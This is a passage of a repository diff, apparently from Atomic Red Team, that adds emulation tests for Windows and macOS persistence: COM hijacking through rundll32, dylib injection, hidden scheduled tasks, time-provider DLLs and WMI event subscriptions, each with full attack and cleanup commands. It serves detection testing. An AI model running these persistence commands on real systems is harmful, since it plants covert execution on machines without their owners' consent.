         name: powershell
+    - name: COM Hijacking with RunDLL32 (Local Server Switch)
+      auto_generated_guid: 123520cc-e998-471b-a920-bd28e3feafa0
+      description: "This test uses PowerShell to hijack a reference to a Component
+        Object Model by creating registry values under InprocServer32 key in the HKCU
+        hive then calling the Class ID to be executed via \"rundll32.exe -localserver
+        [clsid]\". \nThis method is generally used as an alternative to 'rundll32.exe
+        -sta [clsid]' to execute dll's while evading detection. \nReference: https://www.hexacorn.com/blog/2020/02/13/run-lola-bin-run/\nUpon
+        successful execution of this test with the default options, whenever certain
+        apps are opened (for example, Notepad), a calculator window will also be opened. "
+      supported_platforms:
+      - windows
+      input_arguments:
+        clsid_threading:
+          description: Threading Model
+          type: string
+          default: Both
+        dll_path:
+          description: Path to the DLL.
+          type: String
+          default: "$env:temp\\T1546.015_calc.dll"
+        clsid:
+          description: Class ID to hijack.
+          type: string
+          default: "{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}"
+        clsid_description:
+          description: Description for CLSID
+          type: string
+          default: MSAA AccPropServices
+      dependency_executor_name: powershell
+      dependencies:
+      - description: DLL For testing
+        prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1}'
+        get_prereq_command: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015_calc.dll"
+          -OutFile "#{dll_path}"
+      executor:
+        command: |-
+          New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Value '#{clsid_description}'
+          New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Value #{dll_path}
+          New-ItemProperty -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType "String"
+          Start-Process -FilePath "C:\Windows\System32\RUNDLL32.EXE" -ArgumentList '-localserver #{clsid}'
+        cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}'
+          -Recurse -ErrorAction Ignore
+        name: powershell
   T1554:
     technique:
       object_marking_refs:
@@ -48772,6 +49149,47 @@ persistence:
 
           '
         name: bash
+    - name: Dylib Injection via DYLD_INSERT_LIBRARIES
+      auto_generated_guid: 4d66029d-7355-43fd-93a4-b63ba92ea1be
+      description: 'injects a dylib that opens calculator via env variable
+
+        '
+      supported_platforms:
+      - macos
+      input_arguments:
+        file_to_inject:
+          description: Path of executable to be injected. Mostly works on non-apple
+            default apps.
+          type: Path
+          default: "/Applications/Firefox.app/Contents/MacOS/firefox"
+        source_file:
+          description: Path of c source file
+          type: Path
+          default: PathToAtomicsFolder/T1574.006/src/MacOS/T1574.006.c
+        dylib_file:
+          description: Path of dylib file
+          type: Path
+          default: "/tmp/T1574006MOS.dylib"
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Compile the dylib from (#{source_file}). Destination is #{dylib_file}
+
+          '
+        prereq_command: 'gcc -dynamiclib #{source_file} -o #{dylib_file}
+
+          '
+        get_prereq_command: 'gcc -dynamiclib #{source_file} -o #{dylib_file}
+
+          '
+      executor:
+        command: 'DYLD_INSERT_LIBRARIES=#{dylib_file} #{file_to_inject}
+
+          '
+        cleanup_command: |
+          kill `pgrep Calculator`
+          kill `pgrep firefox`
+        name: bash
+        elevation_required: false
   T1546.014:
     technique:
       object_marking_refs:
@@ -53525,6 +53943,24 @@ persistence:
           schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1
           reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1
         name: command_prompt
+    - name: Import XML Schedule Task with Hidden Attribute
+      auto_generated_guid: cd925593-fbb4-486d-8def-16cbdf944bf4
+      description: "Create an scheduled task that executes calc.exe after user login
+        from XML that contains hidden setting attribute. \nThis technique was seen
+        several times in tricbot malware and also with the targetted attack campaigne
+        the industroyer2.\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml")
+          Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
+        cleanup_command: 'Unregister-ScheduledTask -TaskName "atomic red team" -confirm:$false
+          >$null 2>&1
+
+          '
   T1053:
     technique:
       object_marking_refs:
@@ -54775,7 +55211,56 @@ persistence:
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
         url: https://technet.microsoft.com/en-us/sysinternals/bb963902
-    atomic_tests: []
+      identifier: T1547.003
+    atomic_tests:
+    - name: Create a new time provider
+      auto_generated_guid: df1efab7-bc6d-4b88-8be9-91f55ae017aa
+      description: |
+        Establishes persistence by creating a new time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
+        The new time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
+        in C:\Users\Public\ as validation that the test is successful.
+
+        Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
+          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
+          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "Enabled" /d "1" /f
+          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "InputProvider" /d "1" /f
+          net start w32time
+        cleanup_command: |
+          net stop w32time
+          reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /f
+          rm -force C:\Users\Public\AtomicTest.dll
+        name: powershell
+        elevation_required: true
+    - name: Edit an existing time provider
+      auto_generated_guid: 29e0afca-8d1d-471a-8d34-25512fc48315
+      description: |
+        Establishes persistence by editing the NtpServer time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
+        The time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
+        in C:\Users\Public\ as validation that the test is successful.
+
+        Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
+          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
+          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "1" /f
+          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "1" /f
+          net start w32time
+        cleanup_command: |
+          net stop w32time
+          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Windows\SYSTEM32\w32time.DLL" /f
+          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "0" /f
+          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "0" /f
+          rm -force C:\Users\Public\AtomicTest.dll
+        name: powershell
+        elevation_required: true
   T1205:
     technique:
       type: attack-pattern
@@ -55483,7 +55968,7 @@ persistence:
         source_name: Microsoft Register-WmiEvent
       identifier: T1546.003
     atomic_tests:
-    - name: Persistence via WMI Event Subscription
+    - name: Persistence via WMI Event Subscription - CommandLineEventConsumer
       auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0
       description: |
         Run from an administrator powershell window. After running, reboot the victim machine.
@@ -55498,13 +55983,13 @@ persistence:
       - windows
       executor:
         command: |
-          $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
+          $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example';
                           EventNameSpace='root\CimV2';
                           QueryLanguage="WQL";
                           Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
           $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
 
-          $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
+          $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example';
                           CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
           $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
 
@@ -55514,8 +55999,49 @@ persistence:
           }
           $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
         cleanup_command: |
-          $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
-          $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
+          $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'"
+          $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'"
+          $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
+          $FilterConsumerBindingToCleanup | Remove-WmiObject
+          $EventConsumerToCleanup | Remove-WmiObject
+          $EventFilterToCleanup | Remove-WmiObject
+        name: powershell
+        elevation_required: true
+    - name: Persistence via WMI Event Subscription - ActiveScriptEventConsumer
+      auto_generated_guid: fecd0dfd-fb55-45fa-a10b-6250272d0832
+      description: |
+        Run from an administrator powershell window. After running, reboot the victim machine.
+        After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
+
+        Code references
+
+        https://gist.github.com/mgreen27/ef726db0baac5623dc7f76bfa0fc494c
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example';
+                          EventNameSpace='root\CimV2';
+                          QueryLanguage="WQL";
+                          Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
+          $Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments $FilterArgs
+
+          $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example';
+                          ScriptingEngine='VBScript';
+                          ScriptText='
+                          Set objws = CreateObject("Wscript.Shell")
+                          objws.Run "notepad.exe", 0, True
+                          '}
+          $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class ActiveScriptEventConsumer -Arguments $ConsumerArgs
+
+          $FilterToConsumerArgs = @{
+          Filter = $Filter;
+          Consumer = $Consumer;
+          }
+          $FilterToConsumerBinding = Set-WmiInstance -Namespace 'root/subscription' -Class '__FilterToConsumerBinding' -Arguments $FilterToConsumerArgs
+        cleanup_command: |
+          $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class ActiveScriptEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'"
+          $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'"
           $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
           $FilterConsumerBindingToCleanup | Remove-WmiObject
           $EventConsumerToCleanup | Remove-WmiObject
@@ -71303,6 +71829,24 @@ execution:
           schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1
           reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1
         name: command_prompt
+    - name: Import XML Schedule Task with Hidden Attribute
+      auto_generated_guid: cd925593-fbb4-486d-8def-16cbdf944bf4
+      description: "Create an scheduled task that executes calc.exe after user login
+        from XML that contains hidden setting attribute. \nThis technique was seen
+        several times in tricbot malware and also with the targetted attack campaigne
+        the industroyer2.\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml")
+          Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
+        cleanup_command: 'Unregister-ScheduledTask -TaskName "atomic red team" -confirm:$false
+          >$null 2>&1
+
+          '
   T1053:
     technique:
       object_marking_refs:

atomics/T1053.005/T1053.005.md

@@ -22,6 +22,8 @@ An adversary may use Windows Task Scheduler to execute programs at system startu
 
 - [Atomic Test #7 - Scheduled Task Executing Base64 Encoded Commands From Registry](#atomic-test-7---scheduled-task-executing-base64-encoded-commands-from-registry)
 
+- [Atomic Test #8 - Import XML Schedule Task with Hidden Attribute](#atomic-test-8---import-xml-schedule-task-with-hidden-attribute)
+
 
 <br/>
 
@@ -306,4 +308,38 @@ reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - Import XML Schedule Task with Hidden Attribute
+Create an scheduled task that executes calc.exe after user login from XML that contains hidden setting attribute. 
+This technique was seen several times in tricbot malware and also with the targetted attack campaigne the industroyer2.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** cd925593-fbb4-486d-8def-16cbdf944bf4
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml")
+Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
+```
+
+#### Cleanup Commands:
+```powershell
+Unregister-ScheduledTask -TaskName "atomic red team" -confirm:$false >$null 2>&1
+```
+
+
+
+
+
 <br/>

atomics/T1546.003/T1546.003.md

@@ -8,12 +8,14 @@ WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe
 
 ## Atomic Tests
 
-- [Atomic Test #1 - Persistence via WMI Event Subscription](#atomic-test-1---persistence-via-wmi-event-subscription)
+- [Atomic Test #1 - Persistence via WMI Event Subscription - CommandLineEventConsumer](#atomic-test-1---persistence-via-wmi-event-subscription---commandlineeventconsumer)
+
+- [Atomic Test #2 - Persistence via WMI Event Subscription - ActiveScriptEventConsumer](#atomic-test-2---persistence-via-wmi-event-subscription---activescripteventconsumer)
 
 
 <br/>
 
-## Atomic Test #1 - Persistence via WMI Event Subscription
+## Atomic Test #1 - Persistence via WMI Event Subscription - CommandLineEventConsumer
 Run from an administrator powershell window. After running, reboot the victim machine.
 After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
 
@@ -37,13 +39,13 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten
 
 
 ```powershell
-$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
+$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example';
                 EventNameSpace='root\CimV2';
                 QueryLanguage="WQL";
                 Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
 $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
 
-$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
+$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example';
                 CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
 $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
 
@@ -56,8 +58,68 @@ $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassNa
 
 #### Cleanup Commands:
 ```powershell
-$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
-$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
+$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'"
+$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'"
+$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
+$FilterConsumerBindingToCleanup | Remove-WmiObject
+$EventConsumerToCleanup | Remove-WmiObject
+$EventFilterToCleanup | Remove-WmiObject
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Persistence via WMI Event Subscription - ActiveScriptEventConsumer
+Run from an administrator powershell window. After running, reboot the victim machine.
+After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
+
+Code references
+
+https://gist.github.com/mgreen27/ef726db0baac5623dc7f76bfa0fc494c
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** fecd0dfd-fb55-45fa-a10b-6250272d0832
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example';
+                EventNameSpace='root\CimV2';
+                QueryLanguage="WQL";
+                Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
+$Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments $FilterArgs
+
+$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example';
+                ScriptingEngine='VBScript';
+                ScriptText='
+                Set objws = CreateObject("Wscript.Shell")
+                objws.Run "notepad.exe", 0, True
+                '}
+$Consumer=Set-WmiInstance -Namespace "root\subscription" -Class ActiveScriptEventConsumer -Arguments $ConsumerArgs
+
+$FilterToConsumerArgs = @{
+Filter = $Filter;
+Consumer = $Consumer;
+}
+$FilterToConsumerBinding = Set-WmiInstance -Namespace 'root/subscription' -Class '__FilterToConsumerBinding' -Arguments $FilterToConsumerArgs
+```
+
+#### Cleanup Commands:
+```powershell
+$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class ActiveScriptEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'"
+$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'"
 $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
 $FilterConsumerBindingToCleanup | Remove-WmiObject
 $EventConsumerToCleanup | Remove-WmiObject

atomics/T1546.015/T1546.015.md

@@ -10,6 +10,8 @@ Adversaries can use the COM system to insert malicious code that can be executed
 
 - [Atomic Test #2 - Powershell Execute COM Object](#atomic-test-2---powershell-execute-com-object)
 
+- [Atomic Test #3 - COM Hijacking with RunDLL32 (Local Server Switch)](#atomic-test-3---com-hijacking-with-rundll32-local-server-switch)
+
 
 <br/>
 
@@ -102,4 +104,62 @@ Get-Process -Name "*calc" | Stop-Process
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - COM Hijacking with RunDLL32 (Local Server Switch)
+This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under InprocServer32 key in the HKCU hive then calling the Class ID to be executed via "rundll32.exe -localserver [clsid]". 
+This method is generally used as an alternative to 'rundll32.exe -sta [clsid]' to execute dll's while evading detection. 
+Reference: https://www.hexacorn.com/blog/2020/02/13/run-lola-bin-run/
+Upon successful execution of this test with the default options, whenever certain apps are opened (for example, Notepad), a calculator window will also be opened.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 123520cc-e998-471b-a920-bd28e3feafa0
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| clsid_threading | Threading Model | string | Both|
+| dll_path | Path to the DLL. | String | $env:temp&#92;T1546.015_calc.dll|
+| clsid | Class ID to hijack. | string | {B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}|
+| clsid_description | Description for CLSID | string | MSAA AccPropServices|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Value '#{clsid_description}'
+New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Value #{dll_path}
+New-ItemProperty -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType "String"
+Start-Process -FilePath "C:\Windows\System32\RUNDLL32.EXE" -ArgumentList '-localserver #{clsid}'
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: DLL For testing
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{dll_path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015_calc.dll" -OutFile "#{dll_path}"
+```
+
+
+
+
 <br/>

atomics/T1546.015/T1546.015.yaml

@@ -55,3 +55,43 @@ atomic_tests:
     cleanup_command: |
       Get-Process -Name "*calc" | Stop-Process
     name: powershell
+- name: COM Hijacking with RunDLL32 (Local Server Switch)
+  auto_generated_guid: 123520cc-e998-471b-a920-bd28e3feafa0
+  description: |-
+    This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under InprocServer32 key in the HKCU hive then calling the Class ID to be executed via "rundll32.exe -localserver [clsid]". 
+    This method is generally used as an alternative to 'rundll32.exe -sta [clsid]' to execute dll's while evading detection. 
+    Reference: https://www.hexacorn.com/blog/2020/02/13/run-lola-bin-run/
+    Upon successful execution of this test with the default options, whenever certain apps are opened (for example, Notepad), a calculator window will also be opened. 
+  supported_platforms:
+  - windows
+  input_arguments:
+    clsid_threading:
+      description: Threading Model
+      type: string
+      default: Both
+    dll_path:
+      description: Path to the DLL.
+      type: String
+      default: $env:temp\T1546.015_calc.dll
+    clsid:
+      description: Class ID to hijack.
+      type: string
+      default: '{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}'
+    clsid_description:
+      description: Description for CLSID
+      type: string
+      default: MSAA AccPropServices
+  dependency_executor_name: powershell
+  dependencies:
+  - description: DLL For testing
+    prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1}'
+    get_prereq_command: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015_calc.dll" -OutFile "#{dll_path}"
+  executor:
+    command: |-
+      New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Value '#{clsid_description}'
+      New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Value #{dll_path}
+      New-ItemProperty -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType "String"
+      Start-Process -FilePath "C:\Windows\System32\RUNDLL32.EXE" -ArgumentList '-localserver #{clsid}'
+    cleanup_command: |-
+      Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore
+    name: powershell

atomics/T1547.003/T1547.003.md

@@ -0,0 +1,101 @@
+# T1547.003 - Time Providers
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1547/003)
+<blockquote>Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)
+
+Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of  <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\</code>. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)
+
+Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Create a new time provider](#atomic-test-1---create-a-new-time-provider)
+
+- [Atomic Test #2 - Edit an existing time provider](#atomic-test-2---edit-an-existing-time-provider)
+
+
+<br/>
+
+## Atomic Test #1 - Create a new time provider
+Establishes persistence by creating a new time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
+The new time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
+in C:\Users\Public\ as validation that the test is successful.
+
+Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** df1efab7-bc6d-4b88-8be9-91f55ae017aa
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
+reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
+reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "Enabled" /d "1" /f
+reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "InputProvider" /d "1" /f
+net start w32time
+```
+
+#### Cleanup Commands:
+```powershell
+net stop w32time
+reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /f
+rm -force C:\Users\Public\AtomicTest.dll
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Edit an existing time provider
+Establishes persistence by editing the NtpServer time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
+The time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
+in C:\Users\Public\ as validation that the test is successful.
+
+Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 29e0afca-8d1d-471a-8d34-25512fc48315
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
+reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
+reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "1" /f
